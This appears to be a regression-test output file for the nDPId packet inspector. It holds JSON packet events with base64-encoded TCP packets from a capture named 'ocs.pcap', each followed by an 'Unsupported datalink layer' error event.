-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":137,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMESQABABoHXwKi0ArL40DbC2QBQ64tGkd7nbI+AEAV9bBkAAAEBCAoANYRbRwYA+A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":138,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791111} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":138,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMETQABABoHWwKi0ArL40DbC2QBQ64tGkd7ncfuAEAWqZoAAAAEBCAoANYRbRwYA+A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":139,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791112} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":139,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEUQABABoHVwKi0ArL40DbC2QBQ64tGkd7nd2eAEAXYYOYAAAEBCAoANYRbRwYA+A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":140,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791132} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":140,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEVQABABoHUwKi0ArL40DbC2QBQ64tGkd7nfNOAEAYFW0UAAAEBCAoANYRdRwYA\/g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":141,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791137} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":141,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEWQABABoHTwKi0ArL40DbC2QBQ64tGkd7ngj+AEAYyVaoAAAEBCAoANYReRwYA\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":142,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791138} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":142,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEXQABABoHSwKi0ArL40DbC2QBQ64tGkd7nh6uAEAZfUBEAAAEBCAoANYReRwYA\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":143,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791200} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":143,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEYQABABoHRwKi0ArL40DbC2QBQ64tGkd7njReAEAaNSmwAAAEBCAoANYRkRwYBBA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":144,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791202} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":144,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEZQABABoHQwKi0ArL40DbC2QBQ64tGkd7nkoOAEAa6RNMAAAEBCAoANYRkRwYBBA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":145,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791209} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":145,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEaQABABoHDwKi0ArL40DbC2QBQ64tGkd7nkoOwEAa6G6EAAAEBCAoANYRkRwYBBAEBBQre55fv3uedWw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":146,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791274} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":146,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEbQABABoHCwKi0ArL40DbC2QBQ64tGkd7nkoOwEAa6Fi4AAAEBCAoANYRrRwYBBAEBBQre55fv3ueixw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":147,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791286} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":147,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMEcQABABoG5wKi0ArL40DbC2QBQ64tGkd7nkoPQEAa64nkAAAEBCAoANYRsRwYBBAEBBRLe56gz3uetn97nl+\/e56LH"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":148,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791359} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":148,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEdQABABoHAwKi0ArL40DbC2QBQ64tGkd7nosewEAbn6nAAAAEBCAoANYR0RwYBKwEBBQre56gz3uetnw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":149,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791748} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":149,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEeQABABoHLwKi0ArL40DbC2QBQ64tGkd7nrZ+AEAcUKK4AAAEBCAoANYSbRwYBfA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":150,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791817} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":150,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEfQABABoG+wKi0ArL40DbC2QBQ64tGkd7nrZ+wEAcUyTwAAAEBCAoANYSiRwYBfAEBBQre57ML3ue4dw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":151,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791818} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":151,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEgQABABoG9wKi0ArL40DbC2QBQ64tGkd7nrZ+wEAcUw9AAAAEBCAoANYSiRwYBfAEBBQre57ML3ue94w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":152,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791850} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":152,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEhQABABoHIwKi0ArL40DbC2QBQ64tGkd7nveOAEAdCF\/4AAAEBCAoANYSlRwYBsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":153,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791852} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":153,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEiQABABoG7wKi0ArL40DbC2QBQ64tGkd7nveOwEAdCrbsAAAEBCAoANYSlRwYBsAEBBQre57h33ue94w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":154,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791853} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":154,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEjQABABoHGwKi0ArL40DbC2QBQ64tGkd7nw0+AEAdvEmUAAAEBCAoANYSlRwYBsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":155,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791854} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":155,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEkQABABoHFwKi0ArL40DbC2QBQ64tGkd7nyLuAEAecDMwAAAEBCAoANYSlRwYBsA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":156,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791924} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":156,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMElQABABoHEwKi0ArL40DbC2QBQ64tGkd7nzieAEAfJByQAAAEBCAoANYSsRwYBuA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":157,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791929} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":157,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEmQABABoHDwKi0ArL40DbC2QBQ64tGkd7n05OAEAf3AYgAAAEBCAoANYStRwYBuQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":158,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791929} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":158,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEnQABABoHCwKi0ArL40DbC2QBQ64tGkd7n2P+AEAgk++4AAAEBCAoANYStRwYBuQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":159,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791955} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":159,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDl5QABABglxwKi0ArL40DaPSAG7xozNKzpn9fOAEAHuWjsAAAEBCAoANYSwRwYBtw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":160,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791981} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":160,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEoQABABoHBwKi0ArL40DbC2QBQ64tGkd7n3muAEAhR9j4AAAEBCAoANYSyRwYByw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":161,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791982} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":161,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEpQABABoHAwKi0ArL40DbC2QBQ64tGkd7n49eAEAh+8KQAAAEBCAoANYSyRwYBzA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":162,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652791985} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":162,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEqQABABoG\/wKi0ArL40DbC2QBQ64tGkd7n6UOAEAis6wkAAAEBCAoANYSzRwYBzA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":163,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792049} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":163,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMErQABABoG+wKi0ArL40DbC2QBQ64tGkd7n7q+AEAjZ5V4AAAEBCAoANYS5RwYB2A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":164,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792052} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":164,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEsQABABoG9wKi0ArL40DbC2QBQ64tGkd7n9BuAEAkG38UAAAEBCAoANYS5RwYB2A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":165,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792055} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":165,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEtQABABoGwwKi0ArL40DbC2QBQ64tGkd7n9BuwEAkG82IAAAEBCAoANYS5RwYB2AEBBQre5\/mH3uf+8w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":166,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792111} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":166,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMEuQABABoGnwKi0ArL40DbC2QBQ64tGkd7n9BvQEAkGB1EAAAEBCAoANYS\/RwYB2AEBBRLe6ARf3ugJy97n+Yfe5\/7z"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":167,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792112} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":167,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMEvQABABoGmwKi0ArL40DbC2QBQ64tGkd7n9BvQEAkGAeUAAAEBCAoANYS\/RwYB2AEBBRLe6ARf3ugPN97n+Yfe5\/7z"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":168,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792139} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":168,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMEwQABABoGtwKi0ArL40DbC2QBQ64tGkd7n\/vOwEAkzzRcAAAEBCAoANYTCRwYB+QEBBQre6ARf3ugPNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":169,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792188} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":169,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMExQABABoGswKi0ArL40DbC2QBQ64tGkd7n\/vOwEAkzx6YAAAEBCAoANYTHRwYB+QEBBQre6ARf3ugUow=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":170,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792258} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":170,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEyQABABoG3wKi0ArL40DbC2QBQ64tGkd7oFKOAEAlhvpgAAAEBCAoANYTORwYCDQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":171,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792260} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":171,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMEzQABABoG2wKi0ArL40DbC2QBQ64tGkd7oGg+AEAmOuP8AAAEBCAoANYTORwYCDQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":172,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792325} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":172,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANME0QABABoG1wKi0ArL40DbC2QBQ64tGkd7oH3uAEAm7s08AAAEBCAoANYTURwYCHg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":173,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792330} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":173,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANME1QABABoG0wKi0ArL40DbC2QBQ64tGkd7oJOeAEAnorbUAAAEBCAoANYTVRwYCHg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":174,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792335} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":174,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANME2QABABoGzwKi0ArL40DbC2QBQ64tGkd7oKlOAEAoWqBsAAAEBCAoANYTVRwYCHg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":175,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792355} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":175,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPKb0QABABiV3wKi0AkDpuLy6UxRsAv3YCQAAAACgAjkIcdQAAAIEBbQEAggKADWE2AAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":176,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792402} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":176,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQME3QABABoGmwKi0ArL40DbC2QBQ64tGkd7oKlOwEAoWT0EAAAEBCAoANYTcRwYCHgEBBQre6C+\/3ug1Kw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":177,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792403} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":177,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQME4QABABoGlwKi0ArL40DbC2QBQ64tGkd7oKlOwEAoWSdUAAAEBCAoANYTcRwYCHgEBBQre6C+\/3ug6lw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":178,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792492} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":178,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASME5QABABoGcwKi0ArL40DbC2QBQ64tGkd7oKlPQEAoW258AAAEBCAoANYTlRwYCHgEBBRLe6EVv3uhK297oL7\/e6DqX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":179,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652792559} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":179,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQME6QABABoGjwKi0ArL40DbC2QBQ64tGkd7oOpewEApDEyYAAAEBCAoANYTsRwYCWAEBBQre6EVv3uhK2w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":180,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793490} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":180,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQME7QABABoGiwKi0ArL40DbC2QBQ64tGkd7oQAOwEApwDFkAAAEBCAoANYVJRwYDLwEBBQre6EVv3uhK2w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":181,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793563} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":181,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQME8QABABoGhwKi0ArL40DbC2QBQ64tGkd7oQAOwEApwBuYAAAEBCAoANYVQRwYDLwEBBQre6EVv3uhQRw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":182,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793621} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":182,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANME9QABABoGswKi0ArL40DbC2QBQ64tGkd7oUEeAEAqdf9gAAAEBCAoANYVWRwYDZQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":183,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793622} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":183,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANME+QABABoGrwKi0ArL40DbC2QBQ64tGkd7oVbOAEArLej4AAAEBCAoANYVWRwYDZQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":184,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793623} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":184,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANME\/QABABoGqwKi0ArL40DbC2QBQ64tGkd7oWx+AEAr4dKUAAAEBCAoANYVWRwYDZQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":185,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652793724} 